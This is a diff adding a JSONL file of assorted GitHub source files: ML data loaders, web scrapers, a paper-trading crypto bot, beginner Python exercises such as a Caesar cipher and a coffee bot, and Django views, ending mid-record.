diff --git "a/6310.jsonl" "b/6310.jsonl" new file mode 100644--- /dev/null +++ "b/6310.jsonl" @@ -0,0 +1,629 @@ +{"seq_id":"38789993558","text":"\"\"\"Model builder class.\"\"\"\nfrom subprocess import call\n\nfrom qlearning.simplifier import Simplifier\nfrom utils import *\n\n\nclass ModelBuilder:\n \"\"\"Model builder class using KenLM.\"\"\"\n\n def __init__(self, raw_events):\n \"\"\"Initialize the class.\"\"\"\n self.raw_events = raw_events # event from Recorda\n # self.h_events, self.h_events_str = self.create_hash_events(raw_events)\n self.h_event_count, self.h_event_freq = self.create_hash_events_with_frequency(raw_events)\n\n def trim_newline(self, text):\n \"\"\"Remove empty newline or trailing space.\"\"\"\n return \"\".join([s for s\n in text.strip().splitlines(True)\n if s.strip()])\n\n def create_hash_events(self, raw_events):\n \"\"\"Hash all the events in dict and seq of hash events.\n\n format of dict: [{hashValue1: event1}, ...]\n \"\"\"\n hash_events = {}\n hash_events_str = ''\n simplifier = Simplifier()\n for e in raw_events:\n if e[\"eventType\"] == 'TYPE_WINDOW_STATE_CHANGED':\n h_event = simplifier.hash_event(e)\n hash_events_str += '\\n'\n else:\n sim = simplifier.simplification_event(e)\n h_event = sim[0]\n hash_events[h_event] = sim[1]\n hash_events_str += sim[0] + ' '\n\n hash_events_str = self.trim_newline(hash_events_str)\n # hash_events_str = ' '.join(hash_events_list)\n return [hash_events, hash_events_str]\n\n def create_hash_events_with_frequency(self, raw_events):\n \"\"\"Hash all the events in dict and seq of hash events.\n\n format of dict: {hashValue1: simplified event1, hashValue2: simplified event2}, ...\n \"\"\"\n hash_events = {}\n hash_events_count = {}\n simplifier = Simplifier()\n for e in raw_events:\n if e[\"eventType\"] == 'TYPE_WINDOW_STATE_CHANGED':\n h_event = simplifier.hash_event(e)\n else:\n sim = simplifier.simplification_event(e)\n h_event = sim[0]\n hash_events[h_event] = sim[1]\n if h_event in hash_events_count:\n hash_events_count[h_event] += 1\n else:\n hash_events_count[h_event] = 1\n hash_freq = {k: v/float(len(raw_events)) for k, v in hash_events_count.items()}\n return hash_events_count, hash_freq\n\n def save_hash_events(self, eventstr, filename):\n \"\"\"Hash all event to a file.\"\"\"\n path = '../output/'+filename\n write_string_to_file(eventstr, path)\n\n def create_klm_model_from_events(self, events, filename):\n \"\"\"Parse events to .klm file.\n\n create hash events then save to disk.\n then call cmd to create .arpa\n \"\"\"\n self.h_events, self.h_events_str = self.create_hash_events(events)\n self.save_hash_events(self.h_events_str, filename)\n\n call(['../kenlm/bin/lmplz', '-o', '3', '--discount_fallback'],\n stdin=open('../output/'+filename, 'r'),\n stdout=open('../output/'+filename+'.arpa', 'w'))\n\n def get_score(self, event_seq):\n \"\"\"Get probability of the event sequence.\"\"\"\n return self.model.score(event_seq)\n","repo_name":"codeslord/android-reinforcement-learning-testing","sub_path":"src/qlearning/modelbuilder.py","file_name":"modelbuilder.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"5097719407","text":"from setuptools import setup\n\nlong_description = open(\"README.md\", \"r\").read()\n\nsetup(\n name='latlon3',\n version='1.0.4',\n packages=[''],\n url='https://github.com/search5/latlon',\n license='GNU General Public License v3 (GPLv3)',\n author='Lee persy ji-ho',\n 
author_email='search5@gmail.com',\n description='Methods for representing geographic coordinates',\n scripts=['__init__.py', 'latlon.py'],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n install_requires=['six', 'pyproj'],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 2.7\",\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Topic :: Scientific/Engineering\"\n ]\n)\n","repo_name":"search5/latlon","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"95"} +{"seq_id":"3607400228","text":"import torch\nimport pathlib\nimport random\nfrom data import transforms\nimport h5py\nfrom torch.utils.data import Dataset\nimport numpy as np\n\nfrom common.subsample import MaskFunc\n\n\n\nclass SliceData(Dataset):\n \"\"\"\n A PyTorch Dataset that provides access to MR image slices.\n \"\"\"\n\n #def __init__(self, root, acc_factor,dataset_type,mask_path): # acc_factor can be passed here and saved as self variable\n def __init__(self, root, acc_factor,dataset_type): # acc_factor can be passed here and saved as self variable\n # List the h5 files in root \n files = list(pathlib.Path(root).iterdir())\n self.examples = []\n self.acc_factor = acc_factor \n self.dataset_type = dataset_type\n # self.key_img = 'img_volus_{}'.format(self.acc_factor)\n # self.key_kspace = 'kspace_volus_{}'.format(self.acc_factor)\n # self.centre_fraction=[0.08]\n self.accelaration = []\n \n #mask_path = os.path.join(mask_path,'mask_{}.npy'.format(acc_factor))\n #self.mask = np.load(mask_path)\n self.accelaration.append(int(self.acc_factor[0]))\n # print(\"self_acc\",self.accelaration)\n for fname in sorted(files):\n # print(\"fname\",fname)\n with h5py.File(fname,'r') as hf:\n fsvol = hf['volfs']\n num_slices = fsvol.shape[2]\n self.examples += [(fname, slice) for slice in range(num_slices)]\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n # Index the fname and slice using the list created in __init__\n \n fname, slice = self.examples[i] \n # Print statements \n #print (fname,slice)\n \n with h5py.File(fname, 'r') as data:\n\n # input_img = data[self.key_img][:,:,slice]\n # input_kspace = data[self.key_kspace][:,:,slice]\n # input_kspace = npComplexToTorch(input_kspace)\n \n target = data['volfs'][:,:,slice]\n\n kspace_cmplx = np.fft.fftshift(np.fft.fft2(target,norm='ortho'))\n kspace = transforms.to_tensor(kspace_cmplx)\n \n \n mask_func = MaskFunc([0.08], self.accelaration)\n\n seed = tuple(map(ord, str(fname)))\n masked_kspace_square, mask = transforms.apply_mask(kspace.float(), mask_func, seed)\n masked_kspace_np = masked_kspace_square[:,:,0].numpy() + 1j*masked_kspace_square[:,:,1].numpy()\n us_img = np.abs( np.fft.ifft2(masked_kspace_np))\n \n \n \n \n \n \n #uskspace_cmplx = kspace_cmplx * self.mask\n #zf_img = np.abs(np.fft.ifft2(uskspace_cmplx,norm='ortho'))\n \n # if self.dataset_type == 'cardiac':\n # Cardiac dataset should be padded,150 becomes 160. 
# this can be commented for kirby brain \n # input_kspace is not padded, don't bother, as we are not using it\n # print(\"masked_kspace\",masked_kspace_square.shape)\n masked_kspace_square = np.pad(masked_kspace_square,((5,5),(5,5),(0,0)),'constant',constant_values=(0,0))\n # print(\"masked_kspace2\",masked_kspace_square.shape)\n us_img = np.pad(us_img,(5,5),'constant',constant_values=(0,0))\n target = np.pad(target,(5,5),'constant',constant_values=(0,0))\n\n # Print statements\n #print (input.shape,target.shape)\n #return torch.from_numpy(zf_img), torch.from_numpy(target)\n # print(\"fname\",type(fname))\n return us_img, masked_kspace_square , target , str(fname.name) , slice\n \n","repo_name":"amritkumar9595/dualencoder","sub_path":"cardiac/data/mri_data.py","file_name":"mri_data.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
+{"seq_id":"32852101014","text":"import sys\n\nimport cv2\n\nfrom ikalog.scenes.scene import Scene\nfrom ikalog.utils import *\n\n\nclass GameTimerIcon(Scene):\n timer_left = 60\n timer_width = 28\n timer_top = 28\n timer_height = 34\n\n def match_no_cache(self, context):\n frame = context['engine']['frame']\n\n if frame is None:\n return False\n\n return self.mask_timer.match(frame)\n\n def _analyze(self, context):\n pass\n\n def _init_scene(self, debug=False):\n self.mask_timer = IkaMatcher(\n self.timer_left, self.timer_top, self.timer_width, self.timer_height,\n img_file='game_timer_icon.png',\n threshold=0.9,\n orig_threshold=0.35,\n bg_method=matcher.MM_BLACK(visibility=(0, 32)),\n fg_method=matcher.MM_WHITE(visibility=(160, 256)),\n label='timer_icon',\n debug=debug,\n )\n\nif __name__ == \"__main__\":\n GameTimerIcon.main_func()\n","repo_name":"joythegreat/IkaLog","sub_path":"ikalog/scenes/game/timer_icon.py","file_name":"timer_icon.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"18603848946","text":"#Define your functions\r\ndef get_drink_type():\r\n res = input('What type of drink would you like? \\n[a] Brewed Coffee \\n[b] Mocha \\n[c] Latte \\n')\r\n if res == 'a':\r\n return \"Brewed Coffee\"\r\n elif res == 'b':\r\n return 'Mocha'\r\n elif res == 'c':\r\n return 'Latte'\r\n else:\r\n print_message()\r\n return get_drink_type()\r\n\r\n#Defines cream preference\r\ndef cream_pref():\r\n res = input('And what kind of milk for your drink? \\n[a] None \\n[b] 2% milk \\n[c] Non-fat milk \\n[d] Soy milk \\n[e] Almond milk \\n')\r\n if res == 'a':\r\n return \"None\"\r\n elif res == 'b':\r\n return '2% milk'\r\n elif res == 'c':\r\n return 'non-fat milk'\r\n elif res == 'd':\r\n return 'Soy milk'\r\n elif res == 'e':\r\n return 'Almond milk'\r\n else:\r\n print_message()\r\n return cream_pref()\r\n\r\n#Error message used to loop selection.\r\ndef print_message():\r\n print(\"I'm sorry, I did not understand your selection. Please enter the corresponding letter for your response.\")\r\n\r\n#Defines available sizes\r\ndef get_size():\r\n res = input('What size drink can I get for you? 
\\n[a] Small \\n[b] Medium \\n[c] Large \\n')\r\n if res == 'a':\r\n return \"small\"\r\n elif res == 'b':\r\n return 'medium'\r\n elif res == 'c':\r\n return 'large'\r\n else:\r\n print_message()\r\n return get_size()\r\n\r\n#Runs Coffee order\r\ndef coffee_bot():\r\n print(\"Welcome to the cafe!\")\r\n drink_type = get_drink_type()\r\n size = get_size()\r\n cream = cream_pref()\r\n name = input(\"Can I get your name, please? \\n[]\")\r\n print(\"Alright, that's a \" + size, drink_type + \" with \" + cream)\r\n print(\"Thanks, \" + name + \"! Your drink will be ready shortly.\")\r\n\r\ncoffee_bot()\r\n","repo_name":"JJKOTH/JK_Projects","sub_path":"coffee_bot.py","file_name":"coffee_bot.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
+{"seq_id":"37487533272","text":"from script.metadata import HEADER, WORKSHOP_URL\n\nfrom bs4 import BeautifulSoup\nfrom urllib import request\nimport time\nimport random\nimport os\n\n# Extract the id from a workshop URL\ndef ext_id(workshop_url):\n for _ in reversed(workshop_url.split('/')):\n if 'id' in _:\n return _[4:]\n\n# Fetch a workshop page and parse the HTML\ndef call_html(id):\n with request.urlopen(request.Request(url=WORKSHOP_URL+id, headers=HEADER)) as response:\n return BeautifulSoup(response.read(), 'lxml')\n\n# Use a collection id to fetch the workshop ids it contains\ndef collect_mod_id(collection_id):\n id_list = []\n\n # Read the subscription-list section of the collection page\n for _ in call_html(collection_id).find_all('div', class_='workshopItem'):\n id_list.append(ext_id(_.find('a')['href']))\n\n return id_list\n\n# Scrape mod info for each fetched ID\ndef collect_mod_contents(id_list, set_sleep=False):\n mod_dict = {'id':id_list, 'mod':[], 'map':[]}\n \n for id_num in mod_dict['id']:\n # Fetch the page HTML via the URL\n workshop_contents = call_html(id_num).find('div', class_='workshopItemDescription')\n \n for _ in workshop_contents.prettify().split('\\n'):\n # WORKSHOP ID\n if 'Workshop ID: ' in _:\n print('Workshop ID: {}'.format(_.split(': ')[1]))\n # MOD ID\n elif 'Mod ID: ' in _:\n print('Mod ID: {}'.format(_.split(': ')[1]))\n mod_dict['mod'].append(_.split(': ')[1])\n # MAP FOLDER\n elif 'Map Folder: ' in _:\n print('Map Folder: {}'.format(_.split(': ')[1]))\n mod_dict['map'].append(_.split(': ')[1])\n\n if set_sleep:\n time.sleep(random.uniform(1, 3))\n\n print('-' * 20)\n\n return mod_dict\n\ndef save_env(mod_dict, env_path='./'):\n if os.path.isfile(env_path+'.env'):\n print('.env file already exists; deleting and recreating it.')\n os.remove(env_path+'.env')\n env_file = open(env_path+'.env', 'w')\n env_file.write('MOD_WORKSHOP_IDS=' + ';'.join(mod_dict['id']) + '\\n\\n')\n env_file.write('# Muldraugh, KY must always come last.\\n')\n env_file.write('MOD_NAMES='+ ';'.join(mod_dict['mod']) + '\\n\\n')\n env_file.write('MAP_NAMES='+ ';'.join(mod_dict['map']) + ';Muldraugh, KY' + '\\n')\n env_file.close()","repo_name":"expbox77/PZ-MOD-InFo-Collector","sub_path":"script/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"19124985335","text":"\nimport math\nimport threading\nimport time\n\nimport numpy as np\nimport pandas as pd\n\nfrom trade_rl.meta import constants\nfrom trade_rl.meta.data_processors.alpaca_crypto import AlpacaCrypto\nfrom trade_rl.meta.crypto.env_multiple_crypto import generate_action_normalizer\nfrom trade_rl.meta.data_processors._base import time_convert\n\n\nclass AlpacaPaperTradingMultiCrypto:\n def __init__(\n self,\n ticker_list,\n time_interval,\n 
agent,\n agent_path,\n action_dim,\n api_config,\n tech_indicator_list,\n max_stock=1e2,\n ):\n # load agent\n if agent == \"ppo\":\n from stable_baselines3 import PPO\n\n try:\n # load agent\n self.model = PPO.load(agent_path)\n print(\"Successfully load model\", agent_path)\n except:\n raise ValueError(\"Fail to load agent!\")\n else:\n raise ValueError(\"Agent input is NOT supported yet.\")\n\n # connect to Alpaca trading API\n try:\n self.alpaca = AlpacaCrypto(\n time_interval=time_interval, api_config=api_config)\n print(\"Connected to Alpaca API!\")\n except:\n raise ValueError(\n \"Fail to connect Alpaca. Please check account info and internet connection.\"\n )\n # read trading settings\n self.tech_indicator_list = tech_indicator_list\n self.max_stock = max_stock\n self.previous_candles = 250\n self.lookback = 1\n self.action_dim = action_dim\n self.action_decimals = 2\n self.time_interval = time_interval\n\n # initialize account\n self.stocks = np.asarray([0] * len(ticker_list)) # stocks holding\n self.stocks_cd = np.zeros_like(self.stocks)\n self.cash = None # cash record\n self.stocks_df = pd.DataFrame(\n self.stocks, columns=[\"stocks\"], index=ticker_list\n )\n self.asset_list = []\n self.price = np.asarray([0] * len(ticker_list))\n\n stockUniverse = []\n for stock in ticker_list:\n stock = stock.replace(\"USDT\", \"USD\")\n stockUniverse.append(stock)\n\n self.ticker_list = ticker_list\n self.stockUniverse = stockUniverse\n self.equities = []\n\n def test_latency(self, test_times=10):\n \"\"\"Test API Latency.\"\"\"\n total_time = 0\n for _ in range(test_times):\n time0 = time.time()\n self.get_state()\n time1 = time.time()\n temp_time = time1 - time0\n total_time += temp_time\n latency = total_time / test_times\n print(\"latency for data processing: \", latency)\n return latency\n\n def run(self):\n \"\"\"Start trading.\"\"\"\n orders = self.alpaca.api.list_orders(status=\"open\")\n for order in orders:\n self.alpaca.api.cancel_order(order.id)\n while True:\n print(\"\\n\" + \"#################### NEW CANDLE ####################\")\n print(\"#################### NEW CANDLE ####################\" + \"\\n\")\n\n trade = threading.Thread(target=self.trade)\n trade.start()\n trade.join()\n last_equity = float(self.alpaca.api.get_account().last_equity)\n cur_time = time.time()\n self.equities.append([cur_time, last_equity])\n time.sleep(time_convert(self.time_interval))\n\n def trade(self):\n \"\"\"Async trade function.\n\n Get state.\n Predict action in [-1,1] for each stock.\n Normalize action according to average price of a single stock quantity,\n to take into account the difference in scale of crypto prices.\n\n \"\"\"\n # Get state\n state = self.get_state()\n\n # Get action\n action = self.model.predict(state)[0]\n # action = (action * self.max_stock).astype(float)\n\n print(\"\\n\" + \"ACTION: \", action, \"\\n\")\n # Normalize action\n action_norm_vector = generate_action_normalizer(self.price)\n for i in range(self.action_dim):\n norm_vector_i = action_norm_vector[i]\n action[i] = action[i] * norm_vector_i\n\n print(\"\\n\" + \"NORMALIZED ACTION: \", action, \"\\n\")\n\n self.stocks_cd += 1\n min_action = 10 ** -(self.action_decimals) # stock_cd\n # Sell stock\n for index in np.where(action < -min_action)[0]: # sell_index:\n sell_num_shares = min(self.stocks[index], -action[index])\n\n qty = abs(float(sell_num_shares))\n qty = round(qty, self.action_decimals)\n print(\"SELL, qty:\", qty)\n\n respSO = []\n tSubmitOrder = threading.Thread(\n target=self.submitOrder(\n qty, 
self.stockUniverse[index], \"sell\", respSO)\n )\n tSubmitOrder.start()\n tSubmitOrder.join()\n # Update cash balance.\n self.cash = float(self.alpaca.api.get_account().cash)\n self.stocks_cd[index] = 0\n # Buy stock\n for index in np.where(action > min_action)[0]: # buy_index:\n tmp_cash = max(self.cash, 0)\n print(\"current cash:\", tmp_cash)\n # Adjusted part to accept decimal places up to two\n buy_num_shares = min(\n tmp_cash / self.price[index], abs(float(action[index]))\n )\n\n qty = abs(float(buy_num_shares))\n qty = round(qty, self.action_decimals)\n print(\"BUY, qty:\", qty)\n\n respSO = []\n tSubmitOrder = threading.Thread(\n target=self.submitOrder(\n qty, self.stockUniverse[index], \"buy\", respSO)\n )\n tSubmitOrder.start()\n tSubmitOrder.join()\n # Update cash balance.\n self.cash = float(self.alpaca.api.get_account().cash)\n self.stocks_cd[index] = 0\n\n print(\"Trade finished\")\n\n def get_state(self):\n \"\"\"Compute state.\n\n State comprises:\n - Cash balance\n - Stock qty held \n - (tech_indicators, price) for each stock for\n a certain number of lookback time steps\n \"\"\"\n # Fetch a window of lookback time steps price & tech.\n print(\"fetching latest candles..\")\n cur_price, cur_tech, _ = self.alpaca.fetch_latest_data(\n ticker_list=self.stockUniverse,\n time_interval=self.time_interval,\n tech_indicator_list=self.tech_indicator_list,\n )\n self.price = cur_price\n\n # Fetch stock qty held.\n positions = self.alpaca.api.list_positions()\n stocks = [0] * len(self.stockUniverse)\n for position in positions:\n ind = self.stockUniverse.index(position.symbol)\n stocks[ind] = abs(int(float(position.qty)))\n stocks = np.asarray(stocks, dtype=float)\n self.stocks = stocks\n\n # Fetch cash balance\n cash = float(self.alpaca.api.get_account().cash)\n self.cash = cash\n\n # Stack cash and stocks\n state = np.hstack((self.cash * constants.CASH_SCALE,\n self.stocks * constants.STOCK_QTY_SCALE))\n normalized_tech = cur_tech * constants.TECH_SCALE\n normalized_price = cur_price * constants.CASH_SCALE\n state = np.hstack(\n (state, normalized_price, normalized_tech)).astype(np.float32)\n\n print(\"\\n\" + \"STATE:\")\n print(state)\n\n return state\n\n def submitOrder(self, qty, stock, side, resp):\n if qty > 0:\n try:\n self.alpaca.api.submit_order(stock, qty, side, \"market\", \"gtc\")\n print(\n \"Market order of | \"\n + str(qty)\n + \" \"\n + stock\n + \" \"\n + side\n + \" | completed.\"\n )\n resp.append(True)\n except Exception as e:\n print(\"ALPACA API ERROR: \", e)\n print(\n \"Order of | \"\n + str(qty)\n + \" \"\n + stock\n + \" \"\n + side\n + \" | did not go through.\"\n )\n resp.append(False)\n else:\n print(\n \"Quantity is 0, order of | \"\n + str(qty)\n + \" \"\n + stock\n + \" \"\n + side\n + \" | not completed.\"\n )\n resp.append(True)\n\n @staticmethod\n def sigmoid_sign(ary, thresh):\n def sigmoid(x):\n return 1 / (1 + np.exp(-x * np.e)) - 0.5\n\n return sigmoid(ary / thresh) * thresh\n","repo_name":"marcellinamichie291/TradeRL","sub_path":"src/trade_rl/meta/crypto/alpaca_paper_trade_multicrypto.py","file_name":"alpaca_paper_trade_multicrypto.py","file_ext":"py","file_size_in_byte":8793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74782070711","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.upload_file, name='upload_file'),\n # path('options/', views.options, name='options'),\n path('task1/',views.task1,name='task1'),\n path('task2/',views.task2,name='task2'),\n path('task3/',views.task3,name='task3'),\n \n\n]","repo_name":"Darshan2104/Kakcho","sub_path":"miniProject/Tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"1527110118","text":"class Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n left=0\n right=len(matrix)-1\n boll=False\n while left <= right:\n mid = (left+right)//2\n if matrix[mid][0] > target:\n right = mid-1\n elif matrix[mid][-1] < target:\n left= mid+1\n else:\n boll=True\n break\n left=0\n right=len(matrix[0])-1\n booll=False\n if boll:\n while left<=right:\n mid2 = (left+right)//2\n if matrix[mid][mid2] > target:\n right = mid2-1\n elif matrix[mid][mid2] < target:\n left= mid2 + 1\n else:\n booll=True\n break\n return booll\n \n","repo_name":"kalabYibeltal/competitive-Programming","sub_path":"bootCampWeek-2/searchA2DMatrix.py","file_name":"searchA2DMatrix.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"25728666284","text":"from collections import Counter\nfrom statistics import median\n\n#with open('input-real.txt') as input_file:\nwith open('input.txt') as input_file:\n raw_input = input_file.read()\n\ncrabs = raw_input.strip().split(',')\ncrabs = [int(crab) for crab in crabs]\n\ncrabs_count = Counter(crabs)\n\nmost_common = int(crabs_count.most_common()[0][0])\nm = median(crabs)\nprint(most_common, m)\nmost_common = m\n\nmoves = 0\n\nfor crab in crabs:\n movement = int(crab) - most_common\n moves += abs(movement)\n\n# 459589 is too high\nprint(moves)\n","repo_name":"adrianmoisey/adventofcode","sub_path":"2021/7/main-back.py","file_name":"main-back.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40448763228","text":"# Day 8 Project: Ceasar Cipher\n\nimport art\nimport os\nclear = lambda: os.system('cls')\nclear()\n\nprint(art.logo)\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n\ndef ceasar(text, shift, direction):\n end_text = \"\"\n if direction == 'decode':\n shift *= -1\n for char in text:\n if char in alphabet:\n position = alphabet.index(char)\n new_position = position + shift\n end_text += alphabet[new_position]\n else:\n end_text += char\n print(f\"Here's the {direction}d result: {end_text}\")\n\n\nchoose = ''\nwhile choose != 'no':\n direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\").lower()\n text = input(\"Type your message:\\n\").lower()\n shift = int(input(\"Type the shift number:\\n\"))\n if shift >= 26:\n shift %= 26\n ceasar(text, shift, direction)\n choose = input(\"Type 'yes' if you want to go again. 
Otherwise type 'no'.\\n\").lower()\r\nprint(\"Goodbye\")","repo_name":"Matthew1401/100_Days_of_Code","sub_path":"Day-08-CaesarCipher/ceasar-cipher.py","file_name":"ceasar-cipher.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"34434345484","text":"from clases import *\n\nprocess = lambda l: list(map(int, l.split()))\n\ndef parse(file):\n with open(file, 'r') as f:\n lines_raw = f.readlines()\n lines = list(map(process, lines_raw))\n\n total_days = lines[0][2]\n\n books = []\n for idx, score in enumerate(lines[1]):\n # info['books'][idx] = score\n book = Book(idx, score)\n books.append(book)\n \n libraries = []\n line_ix = 2\n library_idx = 0\n while line_ix < len(lines):\n if len(lines[line_ix]) == 0:\n break\n _, treg, rate = lines[line_ix]\n\n line_ix += 1\n\n books_idx = lines[line_ix]\n books_ = [books[ix] for ix in books_idx]\n library = Library(library_idx, books_, treg, rate)\n libraries.append(library)\n # info['libraries'][library_idx] = {\n # 'treg': treg,\n # 'rate': rate,\n # 'books': books}\n line_ix += 1\n library_idx += 1\n\n\n return books, libraries, total_days\n\n\n\ndef escribir_resultado(salida, filename='output.txt'):\n output = open(filename, 'w')\n salida_f = list(filter(lambda x: len(x[1]) > 0, salida))\n output.write(f'{len(salida_f)}\\n')\n for library, books in salida_f:\n output.write(f'{library.id} {len(books)}\\n')\n for book in books:\n output.write(str(book.id) + ' ')\n output.write('\\n')\n\n output.close()\n\n\nif __name__ == '__main__':\n d = parse('input_data/b_read_on.txt')","repo_name":"naxvm/HashCode2020-HABERLAS","sub_path":"parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"2304522807","text":"import time\r\nimport pandas as pd\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\n\r\n## open ACRIS with selenium\r\ndriver = webdriver.Chrome()\r\ndriver.get(\"https://a836-acris.nyc.gov/CP/LookUp/Index\")\r\nassert \"Automated\" in driver.title\r\n\r\n## open CSV\r\ncompletedDF = pd.read_csv('LL24Completed.csv')\r\n\r\n## add empty BBL Column\r\nbbl = \"\"\r\ncompletedDF['BBL'] = bbl\r\n\r\n## iterate over each row and find BBL number with address\r\nfor index, row in completedDF.iterrows():\r\n dfBorough = row['Borough']\r\n dfAddress = row['Address']\r\n \r\n if isinstance(dfBorough, str):\r\n print(dfBorough)\r\n\r\n if isinstance(dfAddress, str):\r\n splitAddress = dfAddress.split()\r\n dfStreetNum = splitAddress[0]\r\n dfStreetName = dfAddress.replace(dfStreetNum, '')\r\n print(dfStreetNum)\r\n print(dfStreetName)\r\n \r\n ## input borough\r\n borough = driver.find_element_by_name(\"select_borough\")\r\n borough.send_keys(dfBorough[0])\r\n borough.send_keys(Keys.RETURN)\r\n \r\n ## input street Num\r\n streetNum = driver.find_element_by_name(\"text_street_number\")\r\n streetNum.clear()\r\n streetNum.send_keys(dfStreetNum)\r\n \r\n ## input street Name\r\n streetName = driver.find_element_by_name(\"text_street_name\")\r\n streetName.clear()\r\n streetName.send_keys(dfStreetName)\r\n \r\n submit22 = driver.find_element_by_name(\"submit22\")\r\n submit22.submit()\r\n \r\n time.sleep(1)\r\n \r\n block = driver.find_element_by_name(\"text_block\")\r\n lot = driver.find_element_by_name(\"text_lot\")\r\n \r\n blockNum 
= block.get_attribute(\"value\")\r\n lotNum = lot.get_attribute(\"value\")\r\n \r\n boroughNum = ''\r\n if dfBorough == 'Manhattan':\r\n boroughNum = '1'\r\n elif dfBorough == 'Bronx':\r\n boroughNum = '2'\r\n elif dfBorough == 'Brooklyn':\r\n boroughNum = '3'\r\n elif dfBorough == 'Queens':\r\n boroughNum = '4'\r\n elif dfBorough == 'Staten Island':\r\n boroughNum = '5'\r\n\r\n bblNum = ''\r\n bblNum = boroughNum + blockNum + lotNum\r\n print(bblNum)\r\n\r\n completedDF.loc[index, 'BBL'] = bblNum\r\n row['BBL'] = bblNum\r\n\r\ncompletedDF.to_csv('LL24Completed_bbl.csv')\r\n\r\n##driver.close()\r\n","repo_name":"veev/schoolofdata2020","sub_path":"python-analysis-cleaning/bblTest.py","file_name":"bblTest.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"18701006233","text":"from datetime import datetime\nimport json\nimport logging\nfrom operator import attrgetter\n\nfrom django.http import (\n HttpResponseForbidden,\n HttpResponseRedirect,\n HttpResponse,\n JsonResponse,\n)\nfrom django.views.decorators.http import require_POST\nfrom django.views.decorators.debug import sensitive_variables, sensitive_post_parameters\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\nfrom django.utils.http import urlquote\n\nfrom nav.auditlog.models import LogEntry\nfrom nav.django.utils import get_account\nfrom nav.models.profiles import NavbarLink, AccountDashboard, AccountNavlet\nfrom nav.web.auth import ACCOUNT_ID_VAR\nfrom nav.web.auth import logout as auth_logout\nfrom nav.web import ldapauth, auth\nfrom nav.web.utils import require_param\nfrom nav.web.webfront.utils import quick_read, tool_list\nfrom nav.web.webfront.forms import (\n LoginForm,\n NavbarLinkFormSet,\n ChangePasswordForm,\n ColumnsForm,\n)\nfrom nav.web.navlets import list_navlets, can_modify_navlet\nfrom nav.web.message import new_message, Messages\nfrom nav.web.webfront import (\n get_widget_columns,\n find_dashboard,\n WELCOME_ANONYMOUS_PATH,\n WELCOME_REGISTERED_PATH,\n)\n\n_logger = logging.getLogger('nav.web.tools')\n\n\ndef index(request, did=None):\n \"\"\"Controller for main page.\"\"\"\n # Read files that will be displayed on front page\n if request.account.is_default_account():\n welcome = quick_read(WELCOME_ANONYMOUS_PATH)\n else:\n welcome = quick_read(WELCOME_REGISTERED_PATH)\n\n dashboard = find_dashboard(request.account, did)\n dashboards = AccountDashboard.objects.filter(account=request.account)\n\n context = {\n 'navpath': [('Home', '/')],\n 'date_now': datetime.today(),\n 'welcome': welcome,\n 'dashboard': dashboard,\n 'dashboards': dashboards,\n 'navlets': list_navlets(),\n 'title': u'NAV - {}'.format(dashboard.name),\n }\n\n if dashboards.count() > 1:\n dashboard_ids = [d.pk for d in dashboards]\n current_index = dashboard_ids.index(dashboard.pk)\n previous_index = current_index - 1\n next_index = current_index + 1\n if current_index == len(dashboard_ids) - 1:\n next_index = 0\n context.update(\n {\n 'previous_dashboard': dashboards.get(pk=dashboard_ids[previous_index]),\n 'next_dashboard': dashboards.get(pk=dashboard_ids[next_index]),\n }\n )\n\n return render(request, 'webfront/index.html', context)\n\n\ndef export_dashboard(request, did):\n \"\"\"Export dashboard as JSON.\"\"\"\n dashboard = get_object_or_404(AccountDashboard, pk=did, 